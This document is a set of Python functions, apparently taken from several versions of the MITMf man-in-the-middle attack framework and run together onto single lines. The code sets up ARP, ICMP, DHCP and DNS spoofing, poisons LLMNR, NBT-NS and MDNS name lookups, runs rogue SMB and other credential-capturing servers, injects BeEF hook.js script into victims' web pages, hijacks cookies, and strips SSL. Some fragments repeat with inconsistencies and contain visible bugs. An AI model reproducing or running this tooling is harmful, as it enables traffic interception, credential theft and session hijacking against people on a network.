def getTargetRange(self, targets): if targets is None: return None try: targetList = [] for target in targets.split(','): if '/' in target: targetList.append(IPNetwork(target)) elif '-' in target: first_half = target.split('-')[0] second_half = first_half + target.split('-')[1] targetList.append(IPRange(first_half, second_half)) else: targetList.append(IPAddress(target)) return targetList except AddrFormatError as e: shutdown( "[ARPpoisoner] Specified an invalid IP address/range/network as target" )
def start(self): if self.gatewaymac is None: shutdown( "[ARPpoisoner] Error: Could not resolve gateway's MAC address") mitmf_logger.debug("[ARPpoisoner] gatewayip => {}".format( self.gatewayip)) mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format( self.gatewaymac)) mitmf_logger.debug("[ARPpoisoner] targets => {}".format( self.targets)) mitmf_logger.debug("[ARPpoisoner] mymac => {}".format(self.mymac)) mitmf_logger.debug("[ARPpoisoner] interface => {}".format( self.interface)) mitmf_logger.debug("[ARPpoisoner] arpmode => {}".format( self.arpmode)) mitmf_logger.debug("[ARPpoisoner] interval => {}".format( self.interval)) if self.arpmode == 'rep': t = threading.Thread(name='ARPpoisoner-rep', target=self.poisonARPrep) elif self.arpmode == 'req': t = threading.Thread(name='ARPpoisoner-req', target=self.poisonARPreq) t.setDaemon(True) t.start()
def __init__(self): try: self.msf = Msfrpc({"host": self.config['MITMf']['Metasploit']['rpcip'], "port": self.config['MITMf']['Metasploit']['rpcport']}) self.msf.login('msf', self.config['MITMf']['Metasploit']['rpcpass']) except Exception as e: shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e))
def start(self): try: self.gatewaymac = getmacbyip(self.gatewayip) if self.gatewaymac is None: shutdown( "[ARPWatch] Error: Could not resolve gateway's MAC address" ) except Exception, e: shutdown( "[ARPWatch] Exception occured while resolving gateway's MAC address: {}" .format(e))
def start(self): self.on_config_change() self.start_config_watch() try: if self.config['MITMf']['DNS']['tcp'].lower() == 'on': self.startTCP() else: self.startUDP() except socket.error as e: if "Address already in use" in e: shutdown("\n[DNS] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
def __init__(self, listenAddress='0.0.0.0', listenPort=445, configFile=''): try: self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) self.server.setSMBChallenge( self.config["MITMf"]["SMB"]["Challenge"]) except socketerror as e: if "Address already in use" in e: shutdown( "\n[-] Unable to start SMB server on port 445: port already in use" )
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.interface = options.interface self.ourip = SystemConfig.getIP(options.interface) try: config = self.config['Responder'] smbChal = self.config['MITMf']['SMB']['Challenge'] except Exception as e: shutdown('[-] Error parsing config for Responder: ' + str(e)) LANFingerprinter().start(options) MDNSPoisoner().start(options, self.ourip) NBTNSPoisoner().start(options, self.ourip) LLMNRPoisoner().start(options, self.ourip) if options.wpad: from core.responder.wpad.WPADPoisoner import WPADPoisoner WPADPoisoner().start(options) if self.config["Responder"]["MSSQL"].lower() == "on": from core.responder.mssql.MSSQLServer import MSSQLServer MSSQLServer().start(smbChal) if self.config["Responder"]["Kerberos"].lower() == "on": from core.responder.kerberos.KERBServer import KERBServer KERBServer().start() if self.config["Responder"]["FTP"].lower() == "on": from core.responder.ftp.FTPServer import FTPServer FTPServer().start() if self.config["Responder"]["POP"].lower() == "on": from core.responder.pop3.POP3Server import POP3Server POP3Server().start() if self.config["Responder"]["SMTP"].lower() == "on": from core.responder.smtp.SMTPServer import SMTPServer SMTPServer().start() if self.config["Responder"]["IMAP"].lower() == "on": from core.responder.imap.IMAPServer import IMAPServer IMAPServer().start() if self.config["Responder"]["LDAP"].lower() == "on": from core.responder.ldap.LDAPServer import LDAPServer LDAPServer().start(smbChal) if options.analyze: self.tree_info.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") self.IsICMPRedirectPlausible(self.ourip)
def onConfigChange(self): beefconfig = self.config['MITMf']['BeEF'] self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format( self.ip_address, beefconfig['beefport']) self.beef = BeefAPI({ "host": beefconfig['beefip'], "port": beefconfig['beefport'] }) if not self.beef.login(beefconfig['user'], beefconfig['pass']): shutdown("[-] Error logging in to BeEF!")
def initialize(self, options): self.options = options self.ip_address = SystemConfig.getIP(options.interface) Inject.initialize(self, options) self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) beefconfig = self.config['MITMf']['BeEF'] self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport']) self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) if not self.beef.login(beefconfig['user'], beefconfig['pass']): shutdown("[BeEFAutorun] Error logging in to BeEF!")
def parseConfig(self): server = None try: if self.server_type == 'normal': formatter = logging.Formatter( "%(asctime)s [SMBserver] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") self.configureLogging(formatter) server = smbserver.SimpleSMBServer(listenPort=self.smb_port) for share in self.config["MITMf"]["SMB"]["Shares"]: path = self.config["MITMf"]["SMB"]["Shares"][share]['path'] readonly = self.config["MITMf"]["SMB"]["Shares"][share][ 'readonly'].lower() server.addShare(share.upper(), path, readOnly=readonly) server.setSMBChallenge(self.smbchallenge) server.setLogFile('') elif self.server_type == 'karma': formatter = logging.Formatter( "%(asctime)s [KarmaSMB] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") self.configureLogging(formatter) server = KarmaSMBServer(self.smbchallenge, self.smb_port) server.defaultFile = self.config["MITMf"]["SMB"]["Karma"][ "defaultfile"] for extension, path in self.config["MITMf"]["SMB"][ "Karma"].iteritems(): server.extensions[extension.upper()] = os.path.normpath( path) else: shutdown( "\n[-] Invalid SMB server type specified in config file!") return server except socketerror as e: if "Address already in use" in e: shutdown( "\n[-] Unable to start SMB server on port {}: port already in use" .format(self.smb_port))
def __init__(self, gateway, interface, mac, targets): try: self.gatewayip = str(IPAddress(gateway)) except AddrFormatError as e: shutdown( "[ARPpoisoner] Specified an invalid IP address as gateway") self.gatewaymac = getmacbyip(gateway) self.mymac = mac self.targets = self.getTargetRange(targets) self.interface = interface self.arpmode = 'rep' self.debug = False self.send = True self.interval = 3
def initialize(self, options): self.options = options self.ip_address = options.ip beefconfig = self.config['MITMf']['BeEF'] Inject.initialize(self, options) self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port']) beefconfig = self.config['MITMf']['BeEF'] from core.utils import shutdown beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']}) if not beef.login(beefconfig['user'], beefconfig['pass']): shutdown("[BeEFAutorun] Error logging in to BeEF!") self.tree_info.append('Starting RuleWatcher') RuleWatcher(beef, self.log).start()
def initialize(self, options): self.options = options self.ferret_port = options.ferret_port self.cookie_file = None URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client'] from core.utils import shutdown if options.cookie_file: self.tree_info.append('Loading cookies from log file') try: with open(options.cookie_file, 'r') as cookie_file: self.cookie_file = json.dumps(cookie_file.read()) URLMonitor.getInstance().cookies = self.cookie_file except Exception as e: shutdown("[-] Error loading cookie log file: {}".format(e)) self.tree_info.append("Listening on port {}".format(self.ferret_port))
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.ferret_port = 10010 or options.ferret_port self.cookie_file = None URLMonitor.getInstance( ).hijack_client = self.config['Ferret-NG']['Client'] if options.cookie_file: self.tree_info.append('Loading cookies from log file') try: with open(options.cookie_file, 'r') as cookie_file: self.cookie_file = ast.literal_eval(cookie_file.read()) URLMonitor.getInstance().cookies = self.cookie_file cookie_file.close() except Exception as e: shutdown("[-] Error loading cookie log file: {}".format(e)) self.tree_info.append("Listening on port {}".format(self.ferret_port))
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.dnscfg = self.config['MITMf']['DNS'] self.dhcpcfg = self.config['Spoof']['DHCP'] self.targets = options.targets self.arpmode = options.arpmode or 'rep' self.manualiptables = options.manualiptables self.mymac = SystemConfig.getMAC(options.interface) self.myip = SystemConfig.getIP(options.interface) self.protocolInstances = [] #Makes scapy more verbose debug = False if options.arp: if not options.gateway: shutdown("[-] --arp argument requires --gateway") if options.targets is None: #if were poisoning whole subnet, start ARP-Watch arpwatch = ARPWatch(options.gateway, self.myip, options.interface) arpwatch.debug = debug self.tree_info.append("ARPWatch online") self.protocolInstances.append(arpwatch) arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets) arp.arpmode = self.arpmode arp.debug = debug self.protocolInstances.append(arp) elif options.icmp: if not options.gateway: shutdown("[-] --icmp argument requires --gateway") if not options.targets: shutdown("[-] --icmp argument requires --targets") icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, self.myip) icmp.debug = debug self.protocolInstances.append(icmp) elif options.dhcp: if options.targets: shutdown("[-] --targets argument invalid when DCHP spoofing") dhcp = DHCPServer(options.interface, self.dhcpcfg, self.myip, self.mymac) dhcp.shellshock = options.shellshock dhcp.debug = debug self.protocolInstances.append(dhcp) if options.dns: if not options.manualiptables: if IpTables.getInstance().dns is False: IpTables.getInstance().DNS(self.dnscfg['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: shutdown( "[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") SystemConfig.setIpForwarding(1) if not options.manualiptables: if IpTables.getInstance().http is False: IpTables.getInstance().HTTP(options.listen) for protocol in self.protocolInstances: protocol.start()
for line in xrange(0, len(plugin.tree_info)): print "| |_ {}".format(plugin.tree_info.pop()) plugin.start_config_watch() if options.filter: from core.packetfilter import PacketFilter pfilter = PacketFilter(options.filter) print "|_ PacketFilter online" for filter in options.filter: print " |_ Applying filter {} to incoming packets".format(filter) try: pfilter.start() except KeyboardInterrupt: pfilter.stop() shutdown() else: from core.sslstrip.CookieCleaner import CookieCleaner from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor URLMonitor.getInstance().setFaviconSpoofing(options.favicon) URLMonitor.getInstance().setCaching(options.preserve_cache) CookieCleaner.getInstance().setEnabled(options.killsessions) strippingFactory = http.HTTPFactory(timeout=10) strippingFactory.protocol = StrippingProxy reactor.listenTCP(options.listen_port, strippingFactory)
def serve_dir(self, dir): import threading import posixpath import urllib import os from SimpleHTTPServer import SimpleHTTPRequestHandler from BaseHTTPServer import HTTPServer as ServerClass Protocol = "HTTP/1.0" port = self.config['Captive']['Port'] ServerString = self.config['Captive']['ServerString'] self.portalurl = "http://{}:{}/".format(self.hostname, port) ROUTES = (['', dir], ) class HandlerClass(SimpleHTTPRequestHandler): '''HandlerClass adapted from https://gist.github.com/creativeaura/5546779''' def translate_path(self, path): '''translate path given routes''' # set default root to cwd root = os.getcwd() # look up routes and set root directory accordingly for pattern, rootdir in ROUTES: if path.startswith(pattern): # found match! path = path[len( pattern):] # consume path up to pattern len root = rootdir break # normalize path and prepend root directory path = path.split('?', 1)[0] path = path.split('#', 1)[0] path = posixpath.normpath(urllib.unquote(path)) words = path.split('/') words = filter(None, words) path = root for word in words: drive, word = os.path.splitdrive(word) head, word = os.path.split(word) if word in (os.curdir, os.pardir): continue path = os.path.join(path, word) return path server_address = ('0.0.0.0', int(port)) HandlerClass.protocol_version = Protocol HandlerClass.server_version = ServerString httpd = ServerClass(server_address, HandlerClass) ServerClass.path = dir sa = httpd.socket.getsockname() try: t = threading.Thread(name='PortalServer', target=httpd.serve_forever) t.setDaemon(True) t.start() self.tree_info.append( "Portal Server instance running on port {} serving {}".format( port, dir)) except Exception as e: shutdown("Failed to start Portal Server")
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.protocol_instances = [] from core.utils import iptables, shutdown, set_ip_forwarding #Makes scapy more verbose debug = False if options.arp: if not options.gateway: shutdown("[Spoof] --arp argument requires --gateway") from core.poisoners.ARP import ARPpoisoner arp = ARPpoisoner(options) arp.debug = debug self.tree_info.append('ARP spoofing enabled') self.protocol_instances.append(arp) elif options.dhcp: from core.poisoners.DHCP import DHCPpoisoner if options.targets: shutdown( "[Spoof] --targets argument invalid when DCHP spoofing") dhcp = DHCPpoisoner(options) dhcp.debug = debug self.tree_info.append('DHCP spoofing enabled') self.protocol_instances.append(dhcp) elif options.icmp: from core.poisoners.ICMP import ICMPpoisoner if not options.gateway: shutdown("[Spoof] --icmp argument requires --gateway") if not options.targets: shutdown("[Spoof] --icmp argument requires --targets") icmp = ICMPpoisoner(options) icmp.debug = debug self.tree_info.append('ICMP spoofing enabled') self.protocol_instances.append(icmp) if options.dns: self.tree_info.append('DNS spoofing enabled') if iptables().dns is False: iptables().DNS(self.config['MITMf']['DNS']['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: shutdown( "[Spoof] Spoof plugin requires --arp, --icmp, --dhcp or --dns") set_ip_forwarding(1) if iptables().http is False: iptables().HTTP(options.listen_port) for protocol in self.protocol_instances: protocol.start()